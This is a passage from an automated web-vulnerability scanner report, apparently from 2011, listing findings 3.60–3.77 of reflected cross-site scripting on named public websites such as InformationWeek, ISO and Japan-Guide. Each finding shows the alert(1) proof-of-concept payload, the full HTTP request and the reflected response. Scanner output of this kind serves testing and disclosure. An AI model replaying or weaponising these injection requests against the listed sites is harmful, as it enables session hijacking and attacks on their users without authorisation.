X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=CZNYUP4NWYEMNQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32539



<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news41182'-alert(1)-'caabbc3a43a/security/vulnerabilities/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=959819525;misc='+new Date().getTime()+'">
...[SNIP]...

3.60. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.informationweek.com
Path:	/news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f5ea'-alert(1)-'3269f48a722 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security5f5ea'-alert(1)-'3269f48a722/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=KDYX0HPPOLIUHQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31904



<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/security5f5ea'-alert(1)-'3269f48a722/vulnerabilities/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=195738155;misc='+new Date().getTime()+'">
...[SNIP]...

3.61. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.informationweek.com
Path:	/news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0c6b"><script>alert(1)</script>52f47d039f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/securityf0c6b"><script>alert(1)</script>52f47d039f8/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=XE51FFWNXUJD1QE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31954



<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/securityf0c6b"><script>alert(1)</script>52f47d039f8/v;kvarticleid=;kvauthor=;loc=300;grp=283268530" target="_blank">
...[SNIP]...

3.62. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.informationweek.com
Path:	/news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a76"><a%20b%3dc>6fa13ace0c8 was submitted in the REST URL parameter 3. This input was echoed as 49a76"><a b=c>6fa13ace0c8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/security/vulnerabilities49a76"><a%20b%3dc>6fa13ace0c8/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=AJWTWR1FR30WBQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32529



<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news/security/vulnerabilities49a76"><a b=c>6fa13ace0c8/sho;kvarticleid=;kvauthor=;loc=300;grp=599724500" target="_blank">
...[SNIP]...

3.63. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.informationweek.com
Path:	/news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a3a7'-alert(1)-'9eba2051cd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/vulnerabilities7a3a7'-alert(1)-'9eba2051cd4/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:46 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:46 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=1AIMFW3SEBOLLQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32515



<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
e="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news/security/vulnerabilities7a3a7'-alert(1)-'9eba2051cd4/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=478137327;misc='+new Date().getTime()+'">
...[SNIP]...

3.64. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.intranetjournal.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7d71--><script>alert(1)</script>44f0d2ca1d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e7d71--><script>alert(1)</script>44f0d2ca1d7=1 HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:29:37 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:30:37 GMT
Connection: close
Content-Type: text/html
Content-Length: 148285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>

<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<script>alert(1)</script>44f0d2ca1d7=1 -->
...[SNIP]...

3.65. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1c915<script>alert(1)</script>1cf63e69e40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?1c915<script>alert(1)</script>1cf63e69e40=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<br />
/index.php?1c915<script>alert(1)</script>1cf63e69e40=1
</div>
...[SNIP]...

3.66. http://www.iso.org/iso/catalogue_detail.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.iso.org
Path:	/iso/catalogue_detail.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 616d8"><script>alert(1)</script>0bec531230b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iso/catalogue_detail.htm?616d8"><script>alert(1)</script>0bec531230b=1 HTTP/1.1
Host: www.iso.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:44 GMT
Server: Apache/2.2.11 (Unix)
Last-Modified: Mon, 28 Feb 2011 03:00:00 GMT
ETag: "11ada659-01010000"
Expires: Tue, 01 Mar 2011 03:00:00 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 10079
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<base href="http://www.
...[SNIP]...
<a href="iso_catalogue/catalogue_tc/catalogue_detail.htm?lang=4&616d8"><script>alert(1)</script>0bec531230b=1" title="Version fran..aise" style="font-weight:bold">
...[SNIP]...

3.67. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.isp-planet.com
Path:	/about/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 51f31--><script>alert(1)</script>4c2513c3044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/sitemap.html?51f31--><script>alert(1)</script>4c2513c3044=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:48:55 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:49:55 GMT
Connection: close
Content-Type: text/html
Content-Length: 65822

<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<script>alert(1)</script>4c2513c3044=1 -->
...[SNIP]...

3.68. http://www.itwhitepapers.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c2ed"-alert(1)-"0b6b2e62c71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php1c2ed"-alert(1)-"0b6b2e62c71 HTTP/1.1
Host: www.itwhitepapers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:37:02 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=gj8orm2sv42en85k152rk84pf6; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: 2f1511d467aa3beecdd06ea6e9b79919=b1974b4123f9173afbc8d8ddf98c0f5d; expires=Tue, 28-Feb-2012 13:37:02 GMT; path=/
Last-Modified: Mon, 28 Feb 2011 13:37:03 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
each page an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/index.php1c2ed"-alert(1)-"0b6b2e62c711"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.e
...[SNIP]...

3.69. http://www.itwhitepapers.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.itwhitepapers.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 285b5"-alert(1)-"ceff258512b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?285b5"-alert(1)-"ceff258512b=1 HTTP/1.1
Host: www.itwhitepapers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:36:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=jka00njg04ta06a00nkknkdhl0; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: 2f1511d467aa3beecdd06ea6e9b79919=cd33582342750b310de1b92f6cbe5b62; expires=Tue, 28-Feb-2012 13:36:49 GMT; path=/
Last-Modified: Mon, 28 Feb 2011 13:36:49 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
each page an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/index.php?285b5"-alert(1)-"ceff258512b=11"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s
...[SNIP]...

3.70. http://www.japan-guide.com/e/e2164.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.japan-guide.com
Path:	/e/e2164.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 518ff><script>alert(1)</script>fdb979a18c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/e2164.html?518ff><script>alert(1)</script>fdb979a18c2=1 HTTP/1.1
Host: www.japan-guide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:36:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: jgid_ip=173.193.214.243; path=/
Set-Cookie: jgid_time=1298900203; path=/
Set-Cookie: geo_c=4; path=/
Set-Cookie: geo_country_c=US; path=/
Connection: close
Content-Type: text/html;charset=shift-jis

<html><head>
<title>Tokyo - City Guide</title>
<meta name=description content="About the city of Tokyo, Japan.">
<meta name=keywords content="tokyo, guide, travel, tourism, sightseeing, tourist">
...[SNIP]...
<a href=http://www.japan-guide.com/m/login.html?aACTION=url&aURL=/e/e2164.htmlxQUE518ff><script>alert(1)</script>fdb979a18c2xEQ1 target=_top rel="nofollow">
...[SNIP]...

3.71. http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jazdtech.com
Path:	/techdirect/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7be38'-alert(1)-'20bea5f77e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /techdirect/?7be38'-alert(1)-'20bea5f77e1=1 HTTP/1.1
Host: www.jazdtech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:59 GMT
Set-Cookie: JazdSession="c8a4f491-794d-47ad-b6a6-bb2752474302:1298900219117"; Version=1; Max-Age=3600; Expires=Mon, 28-Feb-2011 14:36:59 GMT; Path=/
Set-Cookie: JazdTestCookie=1298900219117; Expires=Tue, 28-Feb-2012 13:36:59 GMT; Path=/
Set-Cookie: JSESSIONID=892612E41933A5C0B6AA68A9D78215B7; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 78325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META name=
...[SNIP]...
<a href="http://www.jazdtech.com/techdirect/morePartnerRSSPage.htm?parentPageType=1&contentSetId=60019907&7be38'-alert(1)-'20bea5f77e1=1" class="more_button">
...[SNIP]...

3.72. http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jazdtech.com
Path:	/techdirect/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9122b"><script>alert(1)</script>0a7fdd666d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /techdirect/?9122b"><script>alert(1)</script>0a7fdd666d5=1 HTTP/1.1
Host: www.jazdtech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:56 GMT
Set-Cookie: JazdSession="9d49105c-52be-4d2c-bb47-efd2a80aad21:1298900216277"; Version=1; Max-Age=3600; Expires=Mon, 28-Feb-2011 14:36:56 GMT; Path=/
Set-Cookie: JazdTestCookie=1298900216277; Expires=Tue, 28-Feb-2012 13:36:56 GMT; Path=/
Set-Cookie: JSESSIONID=6516307643D32BF43D843CD6904A396E; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 79398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META name=
...[SNIP]...
<a href="http://www.jazdtech.com/techdirect/moreResearchLibraryPage.htm?parentPageType=1&9122b"><script>alert(1)</script>0a7fdd666d5=1">
...[SNIP]...

3.73. http://www.kitchendaily.com/chefs/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kitchendaily.com
Path:	/chefs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd2e"><script>alert(1)</script>e79a3fd9cf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chefs/?dbd2e"><script>alert(1)</script>e79a3fd9cf8=1 HTTP/1.1
Host: www.kitchendaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:49 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 52227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Chefs & Cooking Exp
...[SNIP]...
<link rel="canonical" href="http://www.kitchendaily.com/chefs/?dbd2e"><script>alert(1)</script>e79a3fd9cf8=1" />
...[SNIP]...

3.74. http://www.kledy.co.uk/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kledy.co.uk
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 730b3"><script>alert(1)</script>4e79c28eac3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?730b3"><script>alert(1)</script>4e79c28eac3=1 HTTP/1.1
Host: www.kledy.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:13 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=erspjnh61dnpdmlf3gifeem83vnvtfrf; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="/730b3"><script>alert(1)</script>4e79c28eac3/1/page/2">
...[SNIP]...

3.75. http://www.kledy.de/bookmarks.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kledy.de
Path:	/bookmarks.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984ff"><script>alert(1)</script>84a31991558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmarks.php?984ff"><script>alert(1)</script>84a31991558=1 HTTP/1.1
Host: www.kledy.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:30 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=jc8bvlk4va4muta8g58r7bj557vcn5t5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90858

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html dir="ltr" lang="de">
   <head>


    <meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft
...[SNIP]...
<a href="?page=2&984ff"><script>alert(1)</script>84a31991558=1" class="pages">
...[SNIP]...

3.76. http://www.kledy.es/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kledy.es
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0eea"><script>alert(1)</script>28b7aad8aa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b0eea"><script>alert(1)</script>28b7aad8aa4=1 HTTP/1.1
Host: www.kledy.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:19 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=ua1e63t4eapvluk1tifdosn2g3btp01k; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 123923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="/b0eea"><script>alert(1)</script>28b7aad8aa4/1/page/2">
...[SNIP]...

3.77. http://www.kledy.eu/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kledy.eu
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cc87"><script>alert(1)</script>8cfab577b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

